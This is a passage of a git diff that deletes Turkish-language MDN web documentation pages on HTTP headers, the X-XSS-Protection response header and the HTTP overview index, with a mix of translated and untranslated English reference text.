href="http://www.iana.org/assignments/message-headers/prov-headers.html">önerilen yeni HTTP mesaj başlıkları kaydını</a> da tutmaktadır.</span></p> - -<p>Başlık bilgileri bağlamlarına (context) göre gruplanabilir:</p> - -<ul> - <li>{{Glossary("General header")}}: Başlık bilgileri hem isteklerde hem de yanıtlarda görülür. Başlık bilgileri gövde hakkında direktifler içerir.</li> - <li>{{Glossary("Request header")}}: Çekilen kaynak veya istemci hakkında daha fazla bilgi içeren başlık bilgileridir. 
Sunucuya gönderilir.</li> - <li>{{Glossary("Response header")}}: Sunucudan alınan yanıt hakkında ek bilgi içeren başlık bilgileridir. Örneğin sunucuya yapılan istek sonucu veya sunucu hakkında bilgi içerir. Tarayıcıya gelir.</li> - <li>{{Glossary("Entity header")}}: Entity gövdesi hakkında daha fazla bilgi içeren başlık bilgileridir. Örneğin MIME-tipi veya içerik uzunluğu.</li> -</ul> - -<p>Başlık bilgileri aynı zamanda vekil sunucuların bunları nasıl ele aldığına göre de gruplanabilir:</p> - -<dl> - <dt><a id="e2e" name="e2e"></a>Uçtan-uca başlık bilgileri (End-to-end headers)</dt> - <dd>These headers must be transmitted to the final recipient of the message; that is, the server for a request or the client for a response. Intermediate proxies must retransmit end-to-end headers unmodified and caches must store them.</dd> - <dt><a id="hbh" name="hbh"></a>Hop-by-hop headers</dt> - <dd>These headers are meaningful only for a single transport-level connection and must not be retransmitted by proxies or cached. Such headers are: {{ httpheader("Connection") }}, {{ httpheader("Keep-Alive") }}, {{ httpheader("Proxy-Authenticate") }}, {{ httpheader("Proxy-Authorization") }}, {{ httpheader("TE") }}, {{ httpheader("Trailer") }}, {{ httpheader("Transfer-Encoding") }} and {{ httpheader("Upgrade") }}. Note that only hop-by-hop headers may be set using the {{ httpheader("Connection") }} general header.</dd> -</dl> - -<p>The following list summarizes HTTP headers by their usage category. 
For an alphabetical list, see the navigation on the left side.</p> - -<h2 id="Authentication">Authentication</h2> - -<dl> - <dt>{{HTTPHeader("WWW-Authenticate")}}</dt> - <dd>Bir kaynağa erişmek için kullanılacak authentication yöntemini tanımlar.</dd> - <dt>{{HTTPHeader("Authorization")}}</dt> - <dd>Contains the credentials to authenticate a user agent with a server.</dd> - <dt>{{HTTPHeader("Proxy-Authenticate")}}</dt> - <dd>Defines the authentication method that should be used to gain access to a resource behind a Proxy server.</dd> - <dt>{{HTTPHeader("Proxy-Authorization")}}</dt> - <dd>Contains the credentials to authenticate a user agent with a proxy server.</dd> -</dl> - -<h2 id="Caching">Caching</h2> - -<dl> - <dt>{{HTTPHeader("Age")}}</dt> - <dd>The time in seconds the object has been in a proxy cache.</dd> - <dt>{{HTTPHeader("Cache-Control")}}</dt> - <dd>Specifies directives for caching mechanisms in both requests and responses.</dd> - <dt>{{HTTPHeader("Expires")}}</dt> - <dd>The date/time after which the response is considered stale.</dd> - <dt>{{HTTPHeader("Pragma")}}</dt> - <dd>Implementation-specific header that may have various effects anywhere along the request-response chain. 
Used for backwards compatibility with HTTP/1.0 caches where the <code>Cache-Control</code> header is not yet present.</dd> - <dt>{{HTTPHeader("Warning")}}</dt> - <dd>A general warning field containing information about possible problems.</dd> -</dl> - -<h2 id="Client_hints">Client hints</h2> - -<dl> - <dt>{{HTTPHeader("Accept-CH")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Content-DPR")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("DPR")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Downlink")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Save-Data")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Viewport-Width")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Width")}}</dt> - <dd>...</dd> -</dl> - -<dl> - <dt> - <h2 id="Conditionals">Conditionals</h2> - </dt> - <dt>{{HTTPHeader("Last-Modified")}}</dt> - <dd>It is a validator, the last modification date of the resource, used to compare several versions of the same resource. It is less accurate than {{HTTPHeader("ETag")}}, but easier to calculate in some environments. Conditional requests using {{HTTPHeader("If-Modified-Since")}} and {{HTTPHeader("If-Unmodified-Since")}} use this value to change the behavior of the request.</dd> - <dt>{{HTTPHeader("ETag")}}</dt> - <dd>It is a validator, a unique string identifying the version of the resource. Conditional requests using {{HTTPHeader("If-Match")}} and {{HTTPHeader("If-None-Match")}} use this value to change the behavior of the request.</dd> - <dt>{{HTTPHeader("If-Match")}}</dt> - <dd>Makes the request conditional and applies the method only if the stored resource matches one of the given ETags.</dd> - <dt>{{HTTPHeader("If-None-Match")}}</dt> - <dd>Makes the request conditional and applies the method only if the stored resource doesn't match any of the given ETags. 
This is used to update caches (for safe requests), or to prevent to upload a new resource when one is already existing.</dd> - <dt>{{HTTPHeader("If-Modified-Since")}}</dt> - <dd>Makes the request conditional and expects the entity to be transmitted only if it has been modified after the given date. This is used to transmit data only when the cache is out of date.</dd> - <dt>{{HTTPHeader("If-Unmodified-Since")}}</dt> - <dd>Makes the request conditional and expects the entity to be transmitted only if it has not been modified after the given date. This is used to ensure the coherence of a new fragment of a specific range with previous ones, or to implement an optimistic concurrency control system when modifying existing documents.</dd> -</dl> - -<h2 id="Connection_management">Connection management</h2> - -<dl> - <dt>{{HTTPHeader("Connection")}}</dt> - <dd>Controls whether the network connection stays open after the current transaction finishes.</dd> - <dt>{{HTTPHeader("Keep-Alive")}}</dt> - <dd>Controls how long a persistent connection should stay open.</dd> -</dl> - -<h2 id="Content_negotiation">Content negotiation</h2> - -<dl> - <dt>{{HTTPHeader("Accept")}}</dt> - <dd>Informs the server about the types of data that can be sent back. It is MIME-type.</dd> - <dt>{{HTTPHeader("Accept-Charset")}}</dt> - <dd>Informs the server about which character set the client is able to understand.</dd> - <dt>{{HTTPHeader("Accept-Encoding")}}</dt> - <dd>Informs the server about the encoding algorithm, usually a compression algorithm, that can be used on the resource sent back.</dd> - <dt>{{HTTPHeader("Accept-Language")}}</dt> - <dd>Informs the server about the language the server is expected to send back. 
This is a hint and is not necessarily under the full control of the user: the server should always pay attention not to override an explicit user choice (like selecting a language in a drop down list).</dd> -</dl> - -<dl> -</dl> - -<h2 id="Controls">Controls</h2> - -<dl> - <dt>{{HTTPHeader("Expect")}}</dt> - <dd>Indicates expectations that need to be fulfilled by the server in order to properly handle the request.</dd> - <dt>{{HTTPHeader("Max-Forwards")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Cookies">Cookies</h2> - -<dl> - <dt>{{HTTPHeader("Cookie")}}</dt> - <dd>Contains stored <a href="/en-US/docs/Web/HTTP/Cookies">HTTP cookies</a> previously sent by the server with the {{HTTPHeader("Set-Cookie")}} header.</dd> - <dt>{{HTTPHeader("Set-Cookie")}}</dt> - <dd>Send cookies from the server to the user agent.</dd> - <dt>{{HTTPHeader("Cookie2")}} {{obsolete_inline}}</dt> - <dd>Used to contain an HTTP cookie, previously sent by the server with the {{HTTPHeader("Set-Cookie2")}} header, but has been obsoleted by the specification. Use {{HTTPHeader("Cookie")}} instead.</dd> - <dt>{{HTTPHeader("Set-Cookie2")}} {{obsolete_inline}}</dt> - <dd>Used to send cookies from the server to the user agent, but has been obsoleted by the specification. 
Use {{HTTPHeader("Set-Cookie")}} instead.</dd> - <dt> - <h2 id="CORS">CORS</h2> - </dt> - <dt>{{HTTPHeader("Access-Control-Allow-Origin")}}</dt> - <dd>Indicates whether the response can be shared.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Credentials")}}</dt> - <dd>Indicates whether the response to the request can be exposed when the credentials flag is true.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Headers")}}</dt> - <dd>Used in response to a preflight request to indicate which HTTP headers can be used when making the actual request.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Methods")}}</dt> - <dd>Specifies the method or methods allowed when accessing the resource in response to a preflight request.</dd> - <dt>{{HTTPHeader("Access-Control-Expose-Headers")}}</dt> - <dd>Indicates which headers can be exposed as part of the response by listing their names.</dd> - <dt>{{HTTPHeader("Access-Control-Max-Age")}}</dt> - <dd>Indicates how long the results of a preflight request can be cached.</dd> - <dt>{{HTTPHeader("Access-Control-Request-Headers")}}</dt> - <dd>Used when issuing a preflight request to let the server know which HTTP headers will be used when the actual request is made.</dd> - <dt>{{HTTPHeader("Access-Control-Request-Method")}}</dt> - <dd>Used when issuing a preflight request to let the server know which <a href="/en-US/docs/Web/HTTP/Methods">HTTP method</a> will be used when the actual request is made.</dd> - <dt>{{HTTPHeader("Origin")}}</dt> - <dd>Indicates where a fetch originates from.</dd> - <dt>{{HTTPHeader("Timing-Allow-Origin")}}</dt> - <dd>Specifies origins that are allowed to see values of attributes retrieved via features of the <a href="/en-US/docs/Web/API/Resource_Timing_API">Resource Timing API</a>, which would otherwise be reported as zero due to cross-origin restrictions.</dd> -</dl> - -<h2 id="Do_Not_Track">Do Not Track</h2> - -<dl> - <dt>{{HTTPHeader("DNT")}}</dt> - <dd>Used for expressing the user's tracking preference.</dd> - 
<dt>{{HTTPHeader("Tk")}}</dt> - <dd>Indicates the tracking status that applied to the corresponding request.</dd> -</dl> - -<h2 id="Downloads">Downloads</h2> - -<dl> - <dt>{{HTTPHeader("Content-Disposition")}}</dt> - <dd>Is a response header if the resource transmitted should be displayed inline (default behavior when the header is not present), or it should be handled like a download and the browser should present a 'Save As' window.</dd> -</dl> - -<h2 id="Message_body_information">Message body information</h2> - -<dl> - <dt>{{HTTPHeader("Content-Length")}}</dt> - <dd>indicates the size of the entity-body, in decimal number of octets, sent to the recipient.</dd> - <dt>{{HTTPHeader("Content-Type")}}</dt> - <dd>Indicates the media type of the resource.</dd> - <dt>{{HTTPHeader("Content-Encoding")}}</dt> - <dd>Used to specify the compression algorithm.</dd> - <dt>{{HTTPHeader("Content-Language")}}</dt> - <dd>Describes the language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language.</dd> - <dt>{{HTTPHeader("Content-Location")}}</dt> - <dd>Indicates an alternate location for the returned data.</dd> - <dt> - <h2 id="Proxies">Proxies</h2> - </dt> -</dl> - -<dl> - <dt>{{HTTPHeader("Forwarded")}}</dt> - <dd>Contains information from the client-facing side of proxy servers that is altered or lost when a proxy is involved in the path of the request.</dd> - <dt>{{HTTPHeader("X-Forwarded-For")}} {{non-standard_inline}}</dt> - <dd>Identifies the originating IP addresses of a client connecting to a web server through an HTTP proxy or a load balancer.</dd> - <dt>{{HTTPHeader("X-Forwarded-Host")}} {{non-standard_inline}}</dt> - <dd>Identifies the original host requested that a client used to connect to your proxy or load balancer.</dd> - <dt>{{HTTPHeader("X-Forwarded-Proto")}} {{non-standard_inline}}</dt> - <dd>identifies the protocol (HTTP or HTTPS) that a client used to connect to your proxy or load 
balancer.</dd> - <dt>{{HTTPHeader("Via")}}</dt> - <dd>Added by proxies, both forward and reverse proxies, and can appear in the request headers and the response headers.</dd> -</dl> - -<h2 id="Redirects">Redirects</h2> - -<dl> - <dt>{{HTTPHeader("Location")}}</dt> - <dd>Indicates the URL to redirect a page to.</dd> -</dl> - -<h2 id="Request_context">Request context</h2> - -<dl> - <dt>{{HTTPHeader("From")}}</dt> - <dd>Contains an Internet email address for a human user who controls the requesting user agent.</dd> - <dt>{{HTTPHeader("Host")}}</dt> - <dd>Specifies the domain name of the server (for virtual hosting), and (optionally) the TCP port number on which the server is listening.</dd> - <dt>{{HTTPHeader("Referer")}}</dt> - <dd>The address of the previous web page from which a link to the currently requested page was followed.</dd> - <dt>{{HTTPHeader("Referrer-Policy")}}</dt> - <dd>Governs which referrer information sent in the {{HTTPHeader("Referer")}} header should be included with requests made.</dd> - <dt>{{HTTPHeader("User-Agent")}}</dt> - <dd>Contains a characteristic string that allows the network protocol peers to identify the application type, operating system, software vendor or software version of the requesting software user agent. 
See also the <a href="/en-US/docs/Web/HTTP/Headers/User-Agent/Firefox">Firefox user agent string reference</a>.</dd> -</dl> - -<h2 id="Response_context">Response context</h2> - -<dl> - <dt>{{HTTPHeader("Allow")}}</dt> - <dd>Lists the set of HTTP request methods support by a resource.</dd> - <dt>{{HTTPHeader("Server")}}</dt> - <dd>Contains information about the software used by the origin server to handle the request.</dd> -</dl> - -<h2 id="Range_requests">Range requests</h2> - -<dl> - <dt>{{HTTPHeader("Accept-Ranges")}}</dt> - <dd>Indicates if the server supports range requests and if so, in which unit the range can be expressed.</dd> - <dt>{{HTTPHeader("Range")}}</dt> - <dd>Indicates the part of a document that the server should return.</dd> - <dt>{{HTTPHeader("If-Range")}}</dt> - <dd>Creates a conditional range request that is only fulfilled if the given etag or date matches the remote resource. Used to prevent downloading two ranges from incompatible version of the resource.</dd> - <dt>{{HTTPHeader("Content-Range")}}</dt> - <dd>Indicates where in a full body message a partial message belongs.</dd> -</dl> - -<h2 id="Security">Security</h2> - -<dl> - <dt>{{HTTPHeader("Content-Security-Policy")}} ({{Glossary("CSP")}})</dt> - <dd>Controls resources the user agent is allowed to load for a given page.</dd> - <dt>{{HTTPHeader("Content-Security-Policy-Report-Only")}}</dt> - <dd>Allows web developers to experiment with policies by monitoring (but not enforcing) their effects. 
These violation reports consist of {{Glossary("JSON")}} documents sent via an HTTP <code>POST</code> request to the specified URI.</dd> - <dt>{{HTTPHeader("Public-Key-Pins")}} ({{Glossary("HPKP")}})</dt> - <dd>Associates a specific cryptographic public key with a certain web server to decrease the risk of {{Glossary("MITM")}} attacks with forged certificates.</dd> - <dt>{{HTTPHeader("Public-Key-Pins-Report-Only")}}</dt> - <dd>Sends reports to the report-uri specified in the header and does still allow clients to connect to the server even if the pinning is violated.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("Strict-Transport-Security")}} ({{Glossary("HSTS")}})</dt> - <dd>Force communication using HTTPS instead of HTTP.</dd> - <dt>{{HTTPHeader("Upgrade-Insecure-Requests")}}</dt> - <dd>Sends a signal to the server expressing the client’s preference for an encrypted and authenticated response, and that it can successfully handle the {{CSP("upgrade-insecure-requests")}} directive.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("X-Content-Type-Options")}}</dt> - <dd>Disables MIME sniffing and forces browser to use the type given in {{HTTPHeader("Content-Type")}}.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("X-Frame-Options")}} (XFO)</dt> - <dd>Indicates whether a browser should be allowed to render a page in a {{HTMLElement("frame")}}, {{HTMLElement("iframe")}} or {{HTMLElement("object")}}</dd> - <dt>{{HTTPHeader("X-XSS-Protection")}}</dt> - <dd>Enables cross-site scripting filtering.</dd> -</dl> - -<h2 id="Server-sent_events">Server-sent events</h2> - -<dl> - <dt>{{HTTPHeader("Ping-From")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Ping-To")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Last-Event-ID")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Transfer_coding">Transfer coding</h2> - -<dl> - <dt>{{HTTPHeader("Transfer-Encoding")}}</dt> - <dd>Specifies the the form of encoding used to safely transfer the entity to the user.</dd> - <dt>{{HTTPHeader("TE")}}</dt> - <dd>Specifies the transfer 
encodings the user agent is willing to accept.</dd> - <dt>{{HTTPHeader("Trailer")}}</dt> - <dd>Allows the sender to include additional fields at the end of chunked message.</dd> -</dl> - -<h2 id="WebSockets">WebSockets</h2> - -<dl> - <dt>{{HTTPHeader("Sec-WebSocket-Key")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Extensions")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Accept")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Protocol")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Version")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Other">Other</h2> - -<dl> - <dt>{{HTTPHeader("Date")}}</dt> - <dd>Contains the date and time at which the message was originated.</dd> - <dt>{{HTTPHeader("Large-Allocation")}}</dt> - <dd>Tells the browser that the page being loaded is going to want to perform a large allocation.</dd> - <dt>{{HTTPHeader("Link")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Retry-After")}}</dt> - <dd>Indicates how long the user agent should wait before making a follow-up request.</dd> - <dt>{{HTTPHeader("SourceMap")}}</dt> - <dd>Links generated code to a <a href="/en-US/docs/Tools/Debugger/How_to/Use_a_source_map">source map</a>.</dd> - <dt>{{HTTPHeader("Upgrade")}}</dt> - <dd>The relevant RFC document for the <a href="https://tools.ietf.org/html/rfc7230#section-6.7">Upgrade header field is RFC 7230, section 6.7</a>. The standard establishes rules for upgrading or changing to a different protocol on the current client, server, transport protocol connection. For example, this header standard allows a client to change from HTTP 1.1 to HTTP 2.0, assuming the server decides to acknowledge and implement the Upgrade header field. Niether party is required to accept the terms specified in the Upgrade header field. It can be used in both client and server headers. If the Upgrade header field is specified, then the sender MUST also send the Connection header field with the upgrade option specified. 
For details on the Connection header field <a href="https://tools.ietf.org/html/rfc7230#section-6.1">please see section 6.1 of the aforementioned RFC</a>.</dd> - <dt>{{HTTPHeader("Vary")}}</dt> - <dd>Determines how to match future request headers to decide whether a cached response can be used rather than requesting a fresh one from the origin server.</dd> - <dt>{{HTTPHeader("X-DNS-Prefetch-Control")}}</dt> - <dd>Controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.</dd> - <dt>{{HTTPHeader("X-Firefox-Spdy")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("X-Requested-With")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("X-UA-Compatible")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Contributing">Contributing</h2> - -<p>You can help by <a href="/en-US/docs/MDN/Contribute/Howto/Document_an_HTTP_header">writing new entries</a> or improving the existing ones.</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="https://en.wikipedia.org/wiki/List_of_HTTP_header_fields">Wikipedia page on List of HTTP headers</a></li> - <li><a href="https://www.iana.org/assignments/message-headers/perm-headers.html">IANA registry</a></li> -</ul> diff --git a/files/tr/web/http/headers/x-xss-protection/index.html b/files/tr/web/http/headers/x-xss-protection/index.html deleted file mode 100644 index fede0fd5d4..0000000000 --- a/files/tr/web/http/headers/x-xss-protection/index.html +++ /dev/null 
@@ -1,77 +0,0 @@ ---- -title: X-XSS-Protection -slug: Web/HTTP/Headers/X-XSS-Protection -translation_of: Web/HTTP/Headers/X-XSS-Protection ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP X-XSS-Protection yanıt üstbilgisi, Internet Explorer'ın, Chrome'un ve Safari'nin, yansıyan bölgeler arası komut dosyalarını algıladıklarında sayfaların yüklenmesini durduran bir özelliğidir ({{Glossary("XSS")}}) Bu güvenlik önlemleri, modern tarayıcılarda siteler güçlü bir şekilde uygulandığında büyük oranda gerekli olmasa da{{HTTPHeader("Content-Security-Policy")}} satır içi JavaScript kullanımını devre dışı bırakan (<code>'unsafe-inline'</code>), henüz desteklemeyen eski web tarayıcılarının kullanıcıları için koruma sağlayabilirler {{Glossary("CSP")}}.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık Tipi</th> - <td>{{Glossary("Response header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Yasak başlık adı")}}</th> - <td>no</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">X-XSS-Protection: 0 -X-XSS-Protection: 1 -X-XSS-Protection: 1; mode=block -X-XSS-Protection: 1; report=<reporting-uri> -</pre> - -<dl> - <dt>0</dt> - <dd>XSS filtrelemeyi devre dışı bırakır.</dd> - <dt>1</dt> - <dd>XSS filtrelemeyi etkinleştirir (genellikle tarayıcılarda varsayılan). Siteler arası komut dosyası çalıştırma saldırısı tespit edilirse, tarayıcı sayfayı sanitize eder (güvensiz kısımları kaldırır).</dd> - <dt>1; mode=block</dt> - <dd>XSS filtrelemesini etkinleştirir. Sayfa sızdırmaz hale getirmek yerine tarayıcı, bir saldırı tespit edilirse sayfanın görüntülenmesini engeller.</dd> - <dt>1; report=<reporting-URI> (Sadece Chromium)</dt> - <dd>XSS filtrelemesini etkinleştirir. Siteler arası komut dosyası çalıştırma saldırısı tespit edilirse, tarayıcı sayfayı sanitize eder ve ihlali bildirir. 
Bu, CSP'nin işlevselliğini kullanır{{CSP("report-uri")}} bir rapor göndermek yönergesi.</dd> -</dl> - -<h2 id="Örneğin">Örneğin</h2> - -<p>Yansıyan XSS saldırılarını tespit ettiklerinde sayfaları yüklemeyi engelleyin:</p> - -<pre class="brush: bash">X-XSS-Protection: 1; mode=block</pre> - -<p>PHP</p> - -<pre class="brush: php">header("X-XSS-Protection: 1; mode=block");</pre> - -<p>Apache (.htaccess)</p> - -<pre class="brush: bash"><IfModule mod_headers.c> - Header set X-XSS-Protection "1; mode=block" -</IfModule></pre> - -<h2 id="Özellikler">Özellikler</h2> - -<p>Spesifikasyonların veya taslakların bir parçası değildir.</p> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden oluşturulmuştur. Verilere katkıda bulunmak istiyorsanız, lütfen https://github.com/mdn/browser-compat-data adresini ziyaret edin ve bize bir çekme isteği gönderin.</p> - -<p>{{Compat("http.headers.X-XSS-Protection")}}</p> - -<h2 id="Bunlara_da_bakın">Bunlara da bakın</h2> - -<ul> - <li>{{HTTPHeader("Content-Security-Policy")}}</li> - <li><a href="https://blogs.msdn.microsoft.com/ieinternals/2011/01/31/controlling-the-xss-filter/">Controlling the XSS Filter – Microsoft</a></li> - <li><a href="https://www.virtuesecurity.com/blog/understanding-xss-auditor/">Understanding XSS Auditor – Virtue Security</a></li> - <li> - <p><a href="http://blog.innerht.ml/the-misunderstood-x-xss-protection/">The misunderstood X-XSS-Protection – blog.innerht.ml</a></p> - </li> -</ul> diff --git a/files/tr/web/http/index.html b/files/tr/web/http/index.html deleted file mode 100644 index 0c331a9f9d..0000000000 --- a/files/tr/web/http/index.html +++ /dev/null 
@@ -1,85 +0,0 @@ ---- -title: HTTP -slug: Web/HTTP -tags: - - HTTP - - HTTP nedir - - Hypertext - - TCP/IP - - Web - - Web Geliştirme -translation_of: Web/HTTP ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><span class="seoSummary"><strong><dfn>Hypertext Transfer Protocol (HTTP) hipermedya belgelerinin "HTML gibi" iletilmesi için oluşturulmuş bir <a class="external" href="https://tr.wikipedia.org/wiki/Uygulama_tabakas%C4%B1">uygulama katmanı</a> protokolüdür. HTTP web tarayıcıları ve web sunucuları arasında iletişim için dizayn edilmiştir, fakat diğer amaçlar için kullanılabilir. HTTP klasik <a class="external" href="https://tr.wikipedia.org/wiki/%C4%B0stemci-sunucu">istemci-sunucu modeline</a> uyar, bir istemci bir istek yapmak için bağlantı kurar ve ardından bir yanıt alana kadar bekler. HTTP <a class="external" href="https://en.wikipedia.org/wiki/Stateless_protocol">durumsuz protokoldür</a>, yani sunucu iki istek arasında herhangi bir veri (durum) tutmaz. Genellikle TCP/IP katmanına dayalı olsa da, herhangi bir güvenilir <a class="external" href="http://en.wikipedia.org/wiki/Transport_Layer">taşıma katmanının</a>, mesajları sessizce kaybetmeyen bir protokol "UDP gibi", üzerinde kullanılabilir. </dfn></strong></span><strong><a href="https://en.wikipedia.org/wiki/Reliable_User_Datagram_Protocol">RUDP</a> - UDP'nin güvenilir bir şekilde güncellenmesi - uygun bir alternatiftir.</strong></p> - -<div class="column-container"> -<div class="column-half"> -<h2 id="Dersler">Dersler</h2> - -<p>HTTP'yi rehberler ve dersler ile öğrenin.</p> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Overview">HTTP'ye Genel Bakış</a></dt> - <dd>İstemci-Sunucu protokolünün temel özellikleri, ne yapabileceği ve kullanım amaçları.</dd> - <dt><a href="/tr/docs/Web/HTTP/Caching">HTTP Önbellek</a></dt> - <dd>Önbellekleme hızlı Web siteleri için çok önemlidir. 
Bu yazı, farklı önbellekleme metodlarını ve HTTP başlıklarının önbellekleme kontrolü için nasıl kullanılacağını açıklamaktadır.</dd> - <dt><a href="/tr/docs/Web/HTTP/Cookies">HTTP Çerezleri</a></dt> - <dd>Çerezlerin nasıl çalıştığı <a class="external" href="http://tools.ietf.org/html/rfc6265">RFC 6265</a> ile belirlenmiştir. Sunucu bir HTTP isteğini karşılarken, cevap içerisindeki HTTP Header'ında bir <code>Set-Cookie</code> gönderebilir. İstemci bu cookie değerini her istekte <code>Cookie</code> Header'ı içerisinde aynı sunucuya geri gönderir. Cookie değeri belirli bir tarihte sona erecek şekilde ayarlanabilir ya da özel bir etki alanı veya yolu ile sınırlanabilir.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Access_control_CORS">HTTP Erişim Kontrolü (CORS)</a></dt> - <dd><strong>Siteler arası HTTP istekleri</strong>, isteği yapan kaynağın etki alanından <strong>farklı bir etki alanı</strong>na yapılan isteklerdir. Örneğin; Domain A (<code>http://domaina.example/</code>) 'da bulunan bir HTML sayfası, <code>img</code> öğesi aracılığıyla Domain B (<code>http://domainb.foo/image.jpg</code>)'ye bir resim için istek atar. Günümüzde web sayfaları kaynaklarını (CSS stil sayfaları, resimler, betikler ve diğerleri) çoğunlukla cross-site olarak yükler. 
CORS; web geliştiricilerin sitelerinin, siteler arası isteklere nasıl tepki vereceğini kontrol etmelerini sağlar.</dd> -</dl> - -<dl> - <dt><a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/Evolution_of_HTTP">HTTP'nin Evrimi</a></dt> - <dd>HTTP'nin ilk sürümleri ile modern HTTP / 2 ve sonrası arasındaki değişikliklerin kısa bir açıklaması.</dd> - <dt><a href="https://wiki.mozilla.org/Security/Guidelines/Web_Security">Mozilla web güvenliği kılavuzları</a></dt> - <dd>Operasyonel ekiplere güvenli web uygulamaları oluşturma konusunda yardımcı olacak ipuçları koleksiyonu.</dd> -</dl> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Mesajlar">HTTP Mesajları</a></dt> - <dd>HTTP / 1.x ve HTTP / 2 türündeki mesajların türünü ve yapısını açıklar.</dd> - <dt><a href="/tr/docs/Web/HTTP/Oturum">Tipik bir HTTP oturumu</a></dt> - <dd>Normal bir HTTP oturumunun akışını gösterir ve açıklar.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Connection_management_in_HTTP_1.x">HTTP/1.x'de bağlantı yönetimi</a></dt> - <dd>HTTP/1.x'de ki 3 bağlantı yönetim modelini ve bunların güçlü ve zayıf yanlarını açıklar.</dd> -</dl> -</div> - -<div class="column-half"> -<h2 id="Referans">Referans</h2> - -<p>Ayrıntılı HTTP referanslarına göz atın.</p> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Headers">HTTP Başlıkları</a></dt> - <dd>HTTP mesaj başlıkları, bir kaynağı ya da sunucu veya istemcinin davranışını tanımlamak için kullanılır. Özel başlıklar X- öneki ile birlikte eklenebilir, diğerleri ise orijinal içeriği <a class="external" href="http://tools.ietf.org/html/rfc4229">RFC 4229</a>'da tanımlı olan <a class="external" href="https://www.iana.org/assignments/message-headers/message-headers.xhtml">IANA kayıtlarında</a> gösterilmiştir. 
IANA, aynı zamanda <a class="external" href="https://www.iana.org/assignments/message-headers/message-headers.xhtml">yeni önerilen HTTP mesaj başlıklarının</a> kaydını bulundurur.</dd> - <dt><a href="/tr/docs/Web/HTTP/Metotlar">HTTP İstek Metodları</a></dt> - <dd>HTTP ile yapılabilen farklı işlemler:<br> - {{HTTPMethod("GET")}}, {{HTTPMethod("POST")}}, ve daha az yaygın olan istek metodları, {{HTTPMethod("OPTIONS")}}, {{HTTPMethod("DELETE")}}, veya {{HTTPMethod("TRACE")}}.</dd> - <dt><a href="/tr/docs/Web/HTTP/Status">HTTP Durum Cevap Kodları</a></dt> - <dd>HTTP cevap kodları, belirli bir HTTP isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtlar beş sınıfta gruplandırılmıştır: bilgilendirme yanıtları, başarılı yanıtlar, yönlendirmeler, istemci hataları ve sunucu hataları.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy">CSP talimatları</a></dt> - <dd>{{HTTPHeader ("Content-Security-Policy")}} cevap başlığı alanları; web sitesi yöneticilerinin, user agent(örn. browser)'ın belirli bir sayfa için yüklemesine izin verilen kaynakları kontrol etmesini sağlar. 
Birkaç istisna dışında, politikalar çoğunlukla sunucu kaynaklarının ve komut dosyası kaynaklarının belirlenmesini içerir.</dd> -</dl> - -<h2 id="Araçlar_kaynaklar">Araçlar & kaynaklar</h2> - -<p>HTTP'yi anlamak ve hata ayıklamak için yardımcı araçlar ve kaynaklar.</p> - -<dl> - <dt><a href="/en-US/docs/Tools">Firefox Developer Tools</a></dt> - <dd><a href="/en-US/docs/Tools/Network_Monitor">Ağ izleyicisi</a></dd> - <dt><a href="https://observatory.mozilla.org/">Mozilla Gözlemevi</a></dt> - <dd> - <p>Proje; geliştiriciler, sistem yöneticileri ve güvenlik uzmanlarının sitelerini korunaklı ve güvenli bir şekilde yapılandırmalarına yardıcı olması için tasarlandı.</p> - </dd> - <dt><a class="external" href="https://redbot.org/">RedBot</a></dt> - <dd>Önbellek ile ilgili HTTP başlıklarını kontrol etmek için araçlar.</dd> - <dt><a href="http://www.html5rocks.com/en/tutorials/internals/howbrowserswork/">Tarayıcılar Nasıl Çalışır</a></dt> - <dd>Tarayıcı içindekiler ve HTTP protokolü üzerinden istek akışı hakkında çok kapsamlı bir makale. Her web gelişticisi KESİNLİKLE-OKUMALI.</dd> -</dl> -</div> -</div> diff --git a/files/tr/web/http/methods/index.html b/files/tr/web/http/methods/index.html deleted file mode 100644 index b31d22a365..0000000000 --- 